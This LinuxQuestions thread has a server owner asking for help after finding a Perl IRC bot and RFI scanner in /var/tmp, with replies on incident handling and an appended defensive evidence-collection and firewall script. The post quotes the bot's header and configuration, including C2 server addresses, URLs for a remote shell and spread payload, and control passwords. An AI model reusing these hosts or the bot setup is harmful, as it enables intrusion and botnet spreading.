Linux - Security
This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.
I have a big problem. I have a server at ThePlanet, and in the last several days (maybe weeks) I sometimes see in the bandwidth graph that the 10mb/s link is 100% used, see http://img144.imageshack.us/img144/9...gimgphpvi3.png
Then I looked in /var/tmp and found some bad code, maybe a script, in which there are some hacker email addresses and some IPs. In some files I also see some IRC script, and on the net I found that the script is for IRC download or something similar.
connectionmethod direct
server 72.20.54.69 9000
server 194.169.192.55 9000
server 71.6.216.111 9000
server 72.20.54.69 31967
server 72.20.54.69 27397
server 72.20.54.69 48618
server 72.20.54.69 55493
server 71.6.216.111 65267
And also some other files; for example, the beginning of one:
Quote:
#!/usr/bin/perl
#####################################################################################
## ##
## ##
## 04/04/2008 ##
## Author : Osirys ##
## Team : Third Eye Security ##
## Ircd : 84.19.176.186 ##
## WebSite : ##
## Contact : osirys[at]live[dot]it ##
## ##
## ## IMPORTANT ## ##
## # ONLY FOR EDUCATIONAL PURPOSE. THE AUTHOR IS NOT RESPONSABLE OF ANY ##
## # IMPROPERLY USE OF THIS TOOL. USE IT AT YOUR OWN RISK !! ##
## # THIS TOOL HAS BEEN MADE TO HELP NET ADMINISTRATORS TO MAKE THEIR ##
## # SYSTEM MORE SECURE. ##
## ## ##
## ##
## Release: v5 Private ##
## I coded this tool only for fun , anyway it works well ! This is a Private ##
## Release, so if you have this Script, please, take care, and don't give it ##
## anyone ! Thank you. ##
## It's a IrcBot. So, after connecting on your Ircd, you can scan for RFI, ##
## LFI, SQL Injection on sites using dorks. ##
## Anyway, u may know, that this one is the better bot ever created ! ##
## Be happy ! ##
## ##
## Features: ##
## [+]Sql Injection Scanner ##
## [+]Remote File Inclusion Scanner ##
## [+]Local File Inclusion Scanner ##
## [+]Integrated Shell, so you can execute commands on the server ##
## [+]Security Mode to protect "dangerous" functions ##
## [+]Spread Mode, to activate or disable Spread Function ##
## [+]Bypass Engines ON: Google, Yahoo ##
## !: To "bypass" these engines, the Scanner just looks for websites on other ##
## engines that use the same bots than the main ones ##
## ##
## ##
#####################################################################################
### !!_/ PRIVATE
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
my $id = "http://rawcraft.info/spread.txt??"; #Your RFI Response
my $shell = "http://r99.li/r57.txt??"; #Shell printed on the Vulnerable Site
my $ircd = "irc.indoirc.net";
my $port = "6667";
my $chan1 = "#fntsze.biz"; #Chan for Scan
my $chan2 = ""; #bot will be printed here too
my $nick="fntsze[".int(rand(1000))."]"; # Scanner Nickname
my $sqlpidpr0c = 1; # This is the number of sites that the bot will test in the same time. For an accurated scann, it's reccomended to set a low number(1)
# (Expecially if you are scanning on 0day bugs), so a lot of presunted vulnerable sites. Unless you will see the bot exiting by an excess flood!
# Instead, if you are scaning on old bugs, so not many results, you can put a higher number, so more speed.
my $rfipidpr0c = 50;
### USEFULL OPTIONS ( 0 => OFF ; 1 => ON )
my $spread = "http://rawcraft.info/t.txt???";
my $spreadACT = 1; #0 ->disabled, 1 ->enabled
my $securityACT = 1; #0 ->disabled, 1 ->enabled
my $killpwd = "fuckoff"; #Password to Kill the Bot
my $chidpwd = "fuckoff"; #Password to change the RFI Response
my $cmdpwd = "fuckoff"; #Password to execute commands on the server
my $secpwd = "fuckoff";
my $spreadpwd = "fuckoff";
my $badspreadpwd != $spreadpwd;
my $badkillpwd != $killpwd;
my $badidpwd != $chidpwd;
my $badcmdpwd =! $cmdpwd;
#######################################################
## END OF CONFIGURATION //
#######################################################
First you have to put your own tools onto the server - and they need to be set up so that they do not use any system tools or libraries. Basically, the safest things are statically linked tools. You may also look at installing a 'rootkit' checking program; have it write a report and you can retrieve the report via 'scp' or something. The report will help you find out what nasties have been put on. Then you need to find out what software was compromised and allowed the lowlife to get into your system. The next step is to write a script to repair all that you can in 1 go - it needs to start out by shutting down all non-essential services (of course ssh must continue to run - which could be difficult if it's a r00t version). You need a script to do it all (and using your 'clean' tools) or else the lowlife might actually be logged on at the time and see what you're doing. I guess somewhere in the 'var' directory will be a good place to hide; the lowlife might be monitoring for changes in the usual executable directories like /bin.
Looking at those scripts, I suspect your server is being used to serve up web pages that inject scripts - send someone an IM or an email with a "this is a funny link!" leading to your web page and their Outlook or MSN Messenger is instantly screwed.
Actually, the first thing to do is to do nothing on the server. If you want to do something then the first step is to get acquainted with the Intruder Detection Checklist (CERT): http://www.cert.org/tech_tips/intrud...checklist.html.
Quote:
Originally Posted by pinniped
put your own tools onto the server
Here you're contradicting yourself with your installation instructions: see the argument you use at "You need a script to do it all". The next step would be gathering available information and that doesn't need installing anything right now: copy the system and daemon logs, login database, password files and full output of listing network connections, process information and open files off the box. Because the OP didn't provide all the necessary nfo, anything beyond that is unnecessary guesswork, speculation.
Quote:
Originally Posted by pinniped
write a script to repair all that you can
I'd also like to point out that at this stage the OP should never ever be confronted with "solutions", and especially not the idea that things are "repairable". IMNSHO that is bad practice: please do not offer that kind of "advice" again. If you want to know what my angle is try reading some incident handling threads in this forum and recaps like http://www.linuxquestions.org/questi...14#post2291514 and http://www.linuxquestions.org/questi...64#post3206764.
A friend told me that it is an IRC bot and that it is run from perl.
There is nothing in the error_log file, and nothing in access_log either, but there are logs in /var/tmp/.something in which there are some login attempts, but those attempts are from 2-3-4 days ago, and the problem still isn't solved. Now I have renamed all files from /tmp/var, added to iptables the ports which IRC uses (from 6667-6700) and rebooted the server, but the problem still isn't solved. I ran rkhunter but no infections were found.
How do I find which perl process that is, and how do I kill it and remove it from my server?
Yes, the first is part of a DCC bot and the second an RFI (Remote File Inclusion) scanner. Looking at the other nfo you forgot to post here, that exploit code you found relates to this CVE vulnerability (yes, you read that right: 2006). What concerns me more is the fact you acknowledge you haven't been vigilant, you haven't been updating the machine, and you haven't secured the machine and then still think you don't have to learn from your mistakes and still could (quoting mladja04: "hope that isnt very compromised and try to clean it on this way"). Please stop thinking about still serving things. Web log, forum, CMS, games, whatever you run on the machine it isn't important anymore and whatever runs should be killed. If you think that's rough then ask ThePlanet right now to do a clean install and get it over with.
I suggest you do the following things:
- read post #4, the part about the CERT link, and act on it,
- copy system and daemon logs, login database, password files and a full output of listing network connections, process information and open files off the box,
- raise your firewall so only traffic from and to your management IP gets through,
- stop all services you don't need like Apache, MySQL, any perl or PHP processes but keep remote access like SSH open but only for your IP,
- run an RPM package verification on all packages and save the log off-site,
- investigate the logs you copied and copy details here. If it's too much tarball them up, upload to some free hoster and post the URI here.
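The collection and firewall steps above, as one script. This is an added example, not code from the thread or from any LQ member, and it assumes: it runs as root on the compromised box; the stock ps/ss/netstat/lsof/last/rpm binaries are what get called (on a rooted box they may lie, which is exactly why the output is shipped off-box with scp rather than analysed locally); and the management address you give lockdown_rules is your own (203.0.113.5 below is a placeholder). Nothing here changes the system: collect_evidence only reads, and lockdown_rules only prints the iptables commands so you can review them before piping them to sh.

```shell
#!/bin/sh
# Added example for the evidence-collection and firewall steps discussed in the
# thread; not from the thread itself. Assumes root on the compromised host and
# the stock system tools (which may be trojaned: the output goes off-box).

# record STATE_DIR NAME CMD...: save one command's output; a missing tool is
# noted in the file rather than aborting the collection
record() {
    state_dir="$1"; name="$2"; shift 2
    if command -v "$1" >/dev/null 2>&1; then
        "$@" >"$state_dir/$name.txt" 2>&1 || true
    else
        echo "tool not available: $1" >"$state_dir/$name.txt"
    fi
}

# collect_evidence OUTDIR [LOGDIR] [DROPDIRS]
# Snapshots processes, sockets, open files, logins, package verification,
# the login database and account files, the system logs and the usual
# world-writable drop directories, then writes a SHA-256 manifest.
# Prints the manifest path.
collect_evidence() {
    out="$1"; logdir="${2:-/var/log}"; dropdirs="${3:-/tmp /var/tmp}"
    mkdir -p "$out/state" "$out/logs" "$out/listings"
    record "$out/state" processes   ps -eo pid,ppid,user,lstart,etime,cmd
    record "$out/state" sockets     ss -tulpan
    record "$out/state" sockets_old netstat -tulpan
    record "$out/state" open_files  lsof -n -P
    record "$out/state" logins      last -F
    record "$out/state" rpm_verify  rpm -Va
    record "$out/state" mounts      mount
    record "$out/state" modules     lsmod
    # login database and account files, timestamps preserved
    for f in /var/log/wtmp /var/log/btmp /var/run/utmp /etc/passwd /etc/shadow /etc/group; do
        [ -e "$f" ] && cp -p "$f" "$out/logs/" 2>/dev/null || true
    done
    # system and daemon logs
    [ -d "$logdir" ] && cp -Rp "$logdir" "$out/logs/syslogs" 2>/dev/null || true
    # full listings (dotfiles included) of the drop directories
    for d in $dropdirs; do
        [ -d "$d" ] && ls -laR "$d" >"$out/listings/$(echo "$d" | tr / _).txt" 2>&1 || true
    done
    # manifest so later tampering with the copied evidence is detectable
    (cd "$out" && find . -type f ! -name MANIFEST.sha256 -exec sha256sum {} + | sort -k2) >"$out/MANIFEST.sha256"
    echo "$out/MANIFEST.sha256"
}

# lockdown_rules MGMT_IP
# Prints an iptables ruleset that lets only loopback and traffic from/to the
# management address through, default policy DROP. The ACCEPT rules are
# emitted before the policy change so an existing SSH session survives.
lockdown_rules() {
    mgmt="$1"
    cat <<EOF
iptables -F
iptables -X
iptables -A INPUT  -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT  -s $mgmt -j ACCEPT
iptables -A OUTPUT -d $mgmt -j ACCEPT
iptables -P INPUT   DROP
iptables -P OUTPUT  DROP
iptables -P FORWARD DROP
EOF
}

# usage: sh collect.sh collect /root/evidence-$(date +%F)   (then scp the directory off)
#        sh collect.sh rules 203.0.113.5 | sh              (placeholder management IP)
case "${1:-}" in
    collect) collect_evidence "$2" ;;
    rules)   lockdown_rules "$2" ;;
esac
```

Copy the output directory off the box and verify it there with sha256sum -c MANIFEST.sha256 before reading anything; the point of the manifest is that the analysis copy can be shown to match what was collected, not that the collecting host is trustworthy.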